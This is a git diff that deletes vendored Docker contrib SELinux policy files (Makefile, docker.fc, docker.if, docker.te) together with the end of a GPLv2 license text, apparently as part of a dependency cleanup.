-signed it.  However, nothing else grants you permission to modify or
-distribute the Program or its derivative works.  These actions are
-prohibited by law if you do not accept this License.  Therefore, by
-modifying or distributing the Program (or any work based on the
-Program), you indicate your acceptance of this License to do so, and
-all its terms and conditions for copying, distributing or modifying
-the Program or works based on it.
-
-  6. Each time you redistribute the Program (or any work based on the
-Program), the recipient automatically receives a license from the
-original licensor to copy, distribute or modify the Program subject to
-these terms and conditions.  You may not impose any further
-restrictions on the recipients' exercise of the rights granted herein.
-You are not responsible for enforcing compliance by third parties to
-this License.
-
-  7. If, as a consequence of a court judgment or allegation of patent
-infringement or for any other reason (not limited to patent issues),
-conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot
-distribute so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you
-may not distribute the Program at all.  For example, if a patent
-license would not permit royalty-free redistribution of the Program by
-all those who receive copies directly or indirectly through you, then
-the only way you could satisfy both it and this License would be to
-refrain entirely from distribution of the Program.
-
-If any portion of this section is held invalid or unenforceable under
-any particular circumstance, the balance of the section is intended to
-apply and the section as a whole is intended to apply in other
-circumstances.
-
-It is not the purpose of this section to induce you to infringe any
-patents or other property right claims or to contest validity of any
-such claims; this section has the sole purpose of protecting the
-integrity of the free software distribution system, which is
-implemented by public license practices.  Many people have made
-generous contributions to the wide range of software distributed
-through that system in reliance on consistent application of that
-system; it is up to the author/donor to decide if he or she is willing
-to distribute software through any other system and a licensee cannot
-impose that choice.
-
-This section is intended to make thoroughly clear what is believed to
-be a consequence of the rest of this License.
-
-  8. If the distribution and/or use of the Program is restricted in
-certain countries either by patents or by copyrighted interfaces, the
-original copyright holder who places the Program under this License
-may add an explicit geographical distribution limitation excluding
-those countries, so that distribution is permitted only in or among
-countries not thus excluded.  In such case, this License incorporates
-the limitation as if written in the body of this License.
-
-  9. The Free Software Foundation may publish revised and/or new versions
-of the General Public License from time to time.  Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
-Each version is given a distinguishing version number.  If the Program
-specifies a version number of this License which applies to it and "any
-later version", you have the option of following the terms and conditions
-either of that version or of any later version published by the Free
-Software Foundation.  If the Program does not specify a version number of
-this License, you may choose any version ever published by the Free Software
-Foundation.
-
-  10. If you wish to incorporate parts of the Program into other free
-programs whose distribution conditions are different, write to the author
-to ask for permission.  For software which is copyrighted by the Free
-Software Foundation, write to the Free Software Foundation; we sometimes
-make exceptions for this.  Our decision will be guided by the two goals
-of preserving the free status of all derivatives of our free software and
-of promoting the sharing and reuse of software generally.
-
-			    NO WARRANTY
-
-  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
-FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
-OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
-PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
-OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
-MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
-TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
-PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
-REPAIR OR CORRECTION.
-
-  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
-REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
-INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
-OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
-TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
-YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
-PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGES.
-
-		     END OF TERMS AND CONDITIONS
-
-	    How to Apply These Terms to Your New Programs
-
-  If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
-
-  To do so, attach the following notices to the program.  It is safest
-to attach them to the start of each source file to most effectively
-convey the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
-
-    <one line to give the program's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-
-
-Also add information on how to contact you by electronic and paper mail.
-
-If the program is interactive, make it output a short notice like this
-when it starts in an interactive mode:
-
-    Gnomovision version 69, Copyright (C) year name of author
-    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
-    This is free software, and you are welcome to redistribute it
-    under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License.  Of course, the commands you use may
-be called something other than `show w' and `show c'; they could even be
-mouse-clicks or menu items--whatever suits your program.
-
-You should also get your employer (if you work as a programmer) or your
-school, if any, to sign a "copyright disclaimer" for the program, if
-necessary.  Here is a sample; alter the names:
-
-  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
-  `Gnomovision' (which makes passes at compilers) written by James Hacker.
-
-  <signature of Ty Coon>, 1 April 1989
-  Ty Coon, President of Vice
-
-This General Public License does not permit incorporating your program into
-proprietary programs.  If your program is a subroutine library, you may
-consider it more useful to permit linking proprietary applications with the
-library.  If this is what you want to do, use the GNU Library General
-Public License instead of this License.
diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile
deleted file mode 100644
index 1bdc695afe..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile
+++ /dev/null
@@ -1,16 +0,0 @@
-TARGETS?=docker
-MODULES?=${TARGETS:=.pp.bz2}
-SHAREDIR?=/usr/share
-
-all: ${TARGETS:=.pp.bz2}
-
-%.pp.bz2: %.pp
-	@echo Compressing $^ -\> $@
-	bzip2 -9 $^
-
-%.pp: %.te
-	make -f ${SHAREDIR}/selinux/devel/Makefile $@
-
-clean:
-	rm -f *~  *.tc *.pp *.pp.bz2
-	rm -rf tmp *.tar.gz
diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc
deleted file mode 100644
index 467d659604..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc
+++ /dev/null
@@ -1,18 +0,0 @@
-/root/\.docker	gen_context(system_u:object_r:docker_home_t,s0)
-
-/usr/bin/dockerd			--	gen_context(system_u:object_r:docker_exec_t,s0)
-
-/usr/lib/systemd/system/docker.service		--	gen_context(system_u:object_r:docker_unit_file_t,s0)
-
-/etc/docker(/.*)?		gen_context(system_u:object_r:docker_config_t,s0)
-
-/var/lib/docker(/.*)?		gen_context(system_u:object_r:docker_var_lib_t,s0)
-
-/var/run/docker\.pid		--	gen_context(system_u:object_r:docker_var_run_t,s0)
-/var/run/docker\.sock		-s	gen_context(system_u:object_r:docker_var_run_t,s0)
-/var/run/docker-client(/.*)?		gen_context(system_u:object_r:docker_var_run_t,s0)
-
-/var/lib/docker/init(/.*)?		gen_context(system_u:object_r:docker_share_t,s0)
-/var/lib/docker/containers/.*/hosts		gen_context(system_u:object_r:docker_share_t,s0)
-/var/lib/docker/containers/.*/hostname		gen_context(system_u:object_r:docker_share_t,s0)
-/var/lib/docker/.*/config\.env	gen_context(system_u:object_r:docker_share_t,s0)
diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if
deleted file mode 100644
index ca075c05c5..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if
+++ /dev/null
@@ -1,461 +0,0 @@
-
-## <summary>The open-source application container engine.</summary>
-
-########################################
-## <summary>
-##	Execute docker in the docker domain.
-## </summary>
-## <param name="domain">
-## <summary>
-##	Domain allowed to transition.
-## </summary>
-## </param>
-#
-interface(`docker_domtrans',`
-	gen_require(`
-		type docker_t, docker_exec_t;
-	')
-
-	corecmd_search_bin($1)
-	domtrans_pattern($1, docker_exec_t, docker_t)
-')
-
-########################################
-## <summary>
-##	Execute docker in the caller domain.
-## </summary>
-## <param name="domain">
-## <summary>
-##	Domain allowed to transition.
-## </summary>
-## </param>
-#
-interface(`docker_exec',`
-	gen_require(`
-		type docker_exec_t;
-	')
-
-	corecmd_search_bin($1)
-	can_exec($1, docker_exec_t)
-')
-
-########################################
-## <summary>
-##	Search docker lib directories.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_search_lib',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	allow $1 docker_var_lib_t:dir search_dir_perms;
-	files_search_var_lib($1)
-')
-
-########################################
-## <summary>
-##	Execute docker lib directories.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_exec_lib',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	allow $1 docker_var_lib_t:dir search_dir_perms;
-	can_exec($1, docker_var_lib_t)
-')
-
-########################################
-## <summary>
-##	Read docker lib files.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_read_lib_files',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	files_search_var_lib($1)
-	read_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
-')
-
-########################################
-## <summary>
-##	Read docker share files.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_read_share_files',`
-	gen_require(`
-		type docker_share_t;
-	')
-
-	files_search_var_lib($1)
-	read_files_pattern($1, docker_share_t, docker_share_t)
-')
-
-########################################
-## <summary>
-##	Manage docker lib files.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_manage_lib_files',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	files_search_var_lib($1)
-	manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
-	manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
-')
-
-########################################
-## <summary>
-##	Manage docker lib directories.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_manage_lib_dirs',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	files_search_var_lib($1)
-	manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t)
-')
-
-########################################
-## <summary>
-##	Create objects in a docker var lib directory
-##	with an automatic type transition to
-##	a specified private type.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-## <param name="private_type">
-##	<summary>
-##	The type of the object to create.
-##	</summary>
-## </param>
-## <param name="object_class">
-##	<summary>
-##	The class of the object to be created.
-##	</summary>
-## </param>
-## <param name="name" optional="true">
-##	<summary>
-##	The name of the object being created.
-##	</summary>
-## </param>
-#
-interface(`docker_lib_filetrans',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	filetrans_pattern($1, docker_var_lib_t, $2, $3, $4)
-')
-
-########################################
-## <summary>
-##	Read docker PID files.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_read_pid_files',`
-	gen_require(`
-		type docker_var_run_t;
-	')
-
-	files_search_pids($1)
-	read_files_pattern($1, docker_var_run_t, docker_var_run_t)
-')
-
-########################################
-## <summary>
-##	Execute docker server in the docker domain.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed to transition.
-##	</summary>
-## </param>
-#
-interface(`docker_systemctl',`
-	gen_require(`
-		type docker_t;
-		type docker_unit_file_t;
-	')
-
-	systemd_exec_systemctl($1)
-	init_reload_services($1)
-        systemd_read_fifo_file_passwd_run($1)
-	allow $1 docker_unit_file_t:file read_file_perms;
-	allow $1 docker_unit_file_t:service manage_service_perms;
-
-	ps_process_pattern($1, docker_t)
-')
-
-########################################
-## <summary>
-##	Read and write docker shared memory.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_rw_sem',`
-	gen_require(`
-		type docker_t;
-	')
-
-	allow $1 docker_t:sem rw_sem_perms;
-')
-
-#######################################
-## <summary>
-##  Read and write the docker pty type.
-## </summary>
-## <param name="domain">
-##  <summary>
-##  Domain allowed access.
-##  </summary>
-## </param>
-#
-interface(`docker_use_ptys',`
-    gen_require(`
-        type docker_devpts_t;
-    ')
-
-    allow $1 docker_devpts_t:chr_file rw_term_perms;
-')
-
-#######################################
-## <summary>
-##      Allow domain to create docker content
-## </summary>
-## <param name="domain">
-##      <summary>
-##      Domain allowed access.
-##      </summary>
-## </param>
-#
-interface(`docker_filetrans_named_content',`
-
-    gen_require(`
-        type docker_var_lib_t;
-        type docker_share_t;
-	type docker_log_t;
-	    type docker_var_run_t;
-        type docker_home_t;
-    ')
-
-    files_pid_filetrans($1, docker_var_run_t, file, "docker.pid")
-    files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock")
-    files_pid_filetrans($1, docker_var_run_t, dir, "docker-client")
-    files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init")
-    userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker")
-')
-
-########################################
-## <summary>
-##	Connect to docker over a unix stream socket.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_stream_connect',`
-	gen_require(`
-		type docker_t, docker_var_run_t;
-	')
-
-	files_search_pids($1)
-	stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t)
-')
-
-########################################
-## <summary>
-##	Connect to SPC containers over a unix stream socket.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_spc_stream_connect',`
-	gen_require(`
-		type spc_t, spc_var_run_t;
-	')
-
-	files_search_pids($1)
-	files_write_all_pid_sockets($1)
-	allow $1 spc_t:unix_stream_socket connectto;
-')
-
-
-########################################
-## <summary>
-##	All of the rules required to administrate
-##	an docker environment
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_admin',`
-	gen_require(`
-		type docker_t;
-		type docker_var_lib_t, docker_var_run_t;
-		type docker_unit_file_t;
-		type docker_lock_t;
-		type docker_log_t;
-		type docker_config_t;
-	')
-
-	allow $1 docker_t:process { ptrace signal_perms };
-	ps_process_pattern($1, docker_t)
-
-	admin_pattern($1, docker_config_t)
-
-	files_search_var_lib($1)
-	admin_pattern($1, docker_var_lib_t)
-
-	files_search_pids($1)
-	admin_pattern($1, docker_var_run_t)
-
-	files_search_locks($1)
-	admin_pattern($1, docker_lock_t)
-
-	logging_search_logs($1)
-	admin_pattern($1, docker_log_t)
-
-	docker_systemctl($1)
-	admin_pattern($1, docker_unit_file_t)
-	allow $1 docker_unit_file_t:service all_service_perms;
-
-	optional_policy(`
-		systemd_passwd_agent_exec($1)
-		systemd_read_fifo_file_passwd_run($1)
-	')
-')
-
-interface(`domain_stub_named_filetrans_domain',`
-    gen_require(`
-        attribute named_filetrans_domain;
-    ')
-')
-
-interface(`lvm_stub',`
-    gen_require(`
-        type lvm_t;
-    ')
-')
-interface(`staff_stub',`
-    gen_require(`
-        type staff_t;
-    ')
-')
-interface(`virt_stub_svirt_sandbox_domain',`
-	gen_require(`
-		attribute svirt_sandbox_domain;
-	')
-')
-interface(`virt_stub_svirt_sandbox_file',`
-	gen_require(`
-		type svirt_sandbox_file_t;
-	')
-')
-interface(`fs_dontaudit_remount_tmpfs',`
-	gen_require(`
-		type tmpfs_t;
-	')
-
-	dontaudit $1 tmpfs_t:filesystem remount;
-')
-interface(`dev_dontaudit_list_all_dev_nodes',`
-	gen_require(`
-		type device_t;
-	')
-
-	dontaudit $1 device_t:dir list_dir_perms;
-')
-interface(`kernel_unlabeled_entry_type',`
-	gen_require(`
-		type unlabeled_t;
-	')
-
-	domain_entry_file($1, unlabeled_t)
-')
-interface(`kernel_unlabeled_domtrans',`
-	gen_require(`
-		type unlabeled_t;
-	')
-
-	read_lnk_files_pattern($1, unlabeled_t, unlabeled_t)
-	domain_transition_pattern($1, unlabeled_t, $2)
-	type_transition $1 unlabeled_t:process $2;
-')
-interface(`files_write_all_pid_sockets',`
-	gen_require(`
-		attribute pidfile;
-	')
-
-	allow $1 pidfile:sock_file write_sock_file_perms;
-')
-interface(`dev_dontaudit_mounton_sysfs',`
-	gen_require(`
-		type sysfs_t;
-	')
-
-	dontaudit $1 sysfs_t:dir mounton;
-')
diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te
deleted file mode 100644
index bad0bb6e4c..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te
+++ /dev/null
@@ -1,407 +0,0 @@
-policy_module(docker, 1.0.0)
-
-########################################
-#
-# Declarations
-#
-
-## <desc>
-##  <p>
-##  Determine whether docker can
-##  connect to all TCP ports.
-##  </p>
-## </desc>
-gen_tunable(docker_connect_any, false)
-
-type docker_t;
-type docker_exec_t;
-init_daemon_domain(docker_t, docker_exec_t)
-domain_subj_id_change_exemption(docker_t)
-domain_role_change_exemption(docker_t)
-
-type spc_t;
-domain_type(spc_t)
-role system_r types spc_t;
-
-type spc_var_run_t;
-files_pid_file(spc_var_run_t)
-
-type docker_var_lib_t;
-files_type(docker_var_lib_t)
-
-type docker_home_t;
-userdom_user_home_content(docker_home_t)
-
-type docker_config_t;
-files_config_file(docker_config_t)
-
-type docker_lock_t;
-files_lock_file(docker_lock_t)
-
-type docker_log_t;
-logging_log_file(docker_log_t)
-
-type docker_tmp_t;
-files_tmp_file(docker_tmp_t)
-
-type docker_tmpfs_t;
-files_tmpfs_file(docker_tmpfs_t)
-
-type docker_var_run_t;
-files_pid_file(docker_var_run_t)
-
-type docker_unit_file_t;
-systemd_unit_file(docker_unit_file_t)
-
-type docker_devpts_t;
-term_pty(docker_devpts_t)
-
-type docker_share_t;
-files_type(docker_share_t)
-
-########################################
-#
-# docker local policy
-#
-allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap };
-allow docker_t self:tun_socket relabelto;
-allow docker_t self:process { getattr signal_perms setrlimit setfscreate };
-allow docker_t self:fifo_file rw_fifo_file_perms;
-allow docker_t self:unix_stream_socket create_stream_socket_perms;
-allow docker_t self:tcp_socket create_stream_socket_perms;
-allow docker_t self:udp_socket create_socket_perms;
-allow docker_t self:capability2 block_suspend;
-
-manage_files_pattern(docker_t, docker_home_t, docker_home_t)
-manage_dirs_pattern(docker_t, docker_home_t, docker_home_t)
-manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t)
-userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker")
-
-manage_dirs_pattern(docker_t, docker_config_t, docker_config_t)
-manage_files_pattern(docker_t, docker_config_t, docker_config_t)
-files_etc_filetrans(docker_t, docker_config_t, dir, "docker")
-
-manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t)
-manage_files_pattern(docker_t, docker_lock_t, docker_lock_t)
-
-manage_dirs_pattern(docker_t, docker_log_t, docker_log_t)
-manage_files_pattern(docker_t, docker_log_t, docker_log_t)
-manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t)
-logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file })
-allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto };
-
-manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t)
-manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t)
-manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t)
-files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file })
-
-manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-allow docker_t docker_tmpfs_t:dir relabelfrom;
-can_exec(docker_t, docker_tmpfs_t)
-fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file })
-allow docker_t docker_tmpfs_t:chr_file mounton;
-
-manage_dirs_pattern(docker_t, docker_share_t, docker_share_t)
-manage_files_pattern(docker_t, docker_share_t, docker_share_t)
-manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t)
-allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto };
-
-can_exec(docker_t, docker_share_t)
-#docker_filetrans_named_content(docker_t)
-
-manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto };
-files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file })
-
-manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t)
-manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
-manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
-manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
-files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file })
-
-allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms };
-term_create_pty(docker_t, docker_devpts_t)
-
-kernel_read_system_state(docker_t)
-kernel_read_network_state(docker_t)
-kernel_read_all_sysctls(docker_t)
-kernel_rw_net_sysctls(docker_t)
-kernel_setsched(docker_t)
-kernel_read_all_proc(docker_t)
-
-domain_use_interactive_fds(docker_t)
-domain_dontaudit_read_all_domains_state(docker_t)
-
-corecmd_exec_bin(docker_t)
-corecmd_exec_shell(docker_t)
-
-corenet_tcp_bind_generic_node(docker_t)
-corenet_tcp_sendrecv_generic_if(docker_t)
-corenet_tcp_sendrecv_generic_node(docker_t)
-corenet_tcp_sendrecv_generic_port(docker_t)
-corenet_tcp_bind_all_ports(docker_t)
-corenet_tcp_connect_http_port(docker_t)
-corenet_tcp_connect_commplex_main_port(docker_t)
-corenet_udp_sendrecv_generic_if(docker_t)
-corenet_udp_sendrecv_generic_node(docker_t)
-corenet_udp_sendrecv_all_ports(docker_t)
-corenet_udp_bind_generic_node(docker_t)
-corenet_udp_bind_all_ports(docker_t)
-
-files_read_config_files(docker_t)
-files_dontaudit_getattr_all_dirs(docker_t)
-files_dontaudit_getattr_all_files(docker_t)
-
-fs_read_cgroup_files(docker_t)
-fs_read_tmpfs_symlinks(docker_t)
-fs_search_all(docker_t)
-fs_getattr_all_fs(docker_t)
-
-storage_raw_rw_fixed_disk(docker_t)
-
-auth_use_nsswitch(docker_t)
-auth_dontaudit_getattr_shadow(docker_t)
-
-init_read_state(docker_t)
-init_status(docker_t)
-
-logging_send_audit_msgs(docker_t)
-logging_send_syslog_msg(docker_t)
-
-miscfiles_read_localization(docker_t)
-
-mount_domtrans(docker_t)
-
-seutil_read_default_contexts(docker_t)
-seutil_read_config(docker_t)
-
-sysnet_dns_name_resolve(docker_t)
-sysnet_exec_ifconfig(docker_t)
-
-optional_policy(`
-	rpm_exec(docker_t)
-	rpm_read_db(docker_t)
-	rpm_exec(docker_t)
-')
-
-optional_policy(`
-	fstools_domtrans(docker_t)
-')
-
-optional_policy(`
-	iptables_domtrans(docker_t)
-')
-
-optional_policy(`
-	openvswitch_stream_connect(docker_t)
-')
-
-allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace };
-
-allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms };
-
-allow docker_t self:netlink_route_socket rw_netlink_socket_perms;;
-allow docker_t self:netlink_audit_socket create_netlink_socket_perms;
-allow docker_t self:unix_dgram_socket { create_socket_perms sendto };
-allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto };
-
-allow docker_t docker_var_lib_t:dir mounton;
-allow docker_t docker_var_lib_t:chr_file mounton;
-can_exec(docker_t, docker_var_lib_t)
-
-kernel_dontaudit_setsched(docker_t)
-kernel_get_sysvipc_info(docker_t)
-kernel_request_load_module(docker_t)
-kernel_mounton_messages(docker_t)
-kernel_mounton_all_proc(docker_t)
-kernel_mounton_all_sysctls(docker_t)
-kernel_unlabeled_entry_type(spc_t)
-kernel_unlabeled_domtrans(docker_t, spc_t)
-
-dev_getattr_all(docker_t)
-dev_getattr_sysfs_fs(docker_t)
-dev_read_urand(docker_t)
-dev_read_lvm_control(docker_t)
-dev_rw_sysfs(docker_t)
-dev_rw_loop_control(docker_t)
-dev_rw_lvm_control(docker_t)
-
-files_getattr_isid_type_dirs(docker_t)
-files_manage_isid_type_dirs(docker_t)
-files_manage_isid_type_files(docker_t)
-files_manage_isid_type_symlinks(docker_t)
-files_manage_isid_type_chr_files(docker_t)
-files_manage_isid_type_blk_files(docker_t)
-files_exec_isid_files(docker_t)
-files_mounton_isid(docker_t)
-files_mounton_non_security(docker_t)
-files_mounton_isid_type_chr_file(docker_t)
-
-fs_mount_all_fs(docker_t)
-fs_unmount_all_fs(docker_t)
-fs_remount_all_fs(docker_t)
-files_mounton_isid(docker_t)
-fs_manage_cgroup_dirs(docker_t)
-fs_manage_cgroup_files(docker_t)
-fs_relabelfrom_xattr_fs(docker_t)
-fs_relabelfrom_tmpfs(docker_t)
-fs_read_tmpfs_symlinks(docker_t)
-fs_list_hugetlbfs(docker_t)
-
-term_use_generic_ptys(docker_t)
-term_use_ptmx(docker_t)
-term_getattr_pty_fs(docker_t)
-term_relabel_pty_fs(docker_t)
-term_mounton_unallocated_ttys(docker_t)
-
-modutils_domtrans_insmod(docker_t)
-
-systemd_status_all_unit_files(docker_t)
-systemd_start_systemd_services(docker_t)
-
-userdom_stream_connect(docker_t)
-userdom_search_user_home_content(docker_t)
-userdom_read_all_users_state(docker_t)
-userdom_relabel_user_home_files(docker_t)
-userdom_relabel_user_tmp_files(docker_t)
-userdom_relabel_user_tmp_dirs(docker_t)
-
-optional_policy(`
-	gpm_getattr_gpmctl(docker_t)
-')
-
-optional_policy(`
-	dbus_system_bus_client(docker_t)
-	init_dbus_chat(docker_t)
-	init_start_transient_unit(docker_t)
-
-	optional_policy(`
-		systemd_dbus_chat_logind(docker_t)
-	')
-
-	optional_policy(`
-		firewalld_dbus_chat(docker_t)
-	')
-')
-
-optional_policy(`
-	udev_read_db(docker_t)
-')
-
-optional_policy(`
-	virt_read_config(docker_t)
-	virt_exec(docker_t)
-	virt_stream_connect(docker_t)
-	virt_stream_connect_sandbox(docker_t)
-	virt_exec_sandbox_files(docker_t)
-	virt_manage_sandbox_files(docker_t)
-	virt_relabel_sandbox_filesystem(docker_t)
-	virt_transition_svirt_sandbox(docker_t, system_r)
-	virt_mounton_sandbox_file(docker_t)
-#	virt_attach_sandbox_tun_iface(docker_t)
-	allow docker_t svirt_sandbox_domain:tun_socket relabelfrom;
-')
-
-tunable_policy(`docker_connect_any',`
-    corenet_tcp_connect_all_ports(docker_t)
-    corenet_sendrecv_all_packets(docker_t)
-    corenet_tcp_sendrecv_all_ports(docker_t)
-')
-
-########################################
-#
-# spc local policy
-#
-domain_entry_file(spc_t, docker_share_t)
-domain_entry_file(spc_t, docker_var_lib_t)
-role system_r types spc_t;
-
-domain_entry_file(spc_t, docker_share_t)
-domain_entry_file(spc_t, docker_var_lib_t)
-domtrans_pattern(docker_t, docker_share_t, spc_t)
-domtrans_pattern(docker_t, docker_var_lib_t, spc_t)
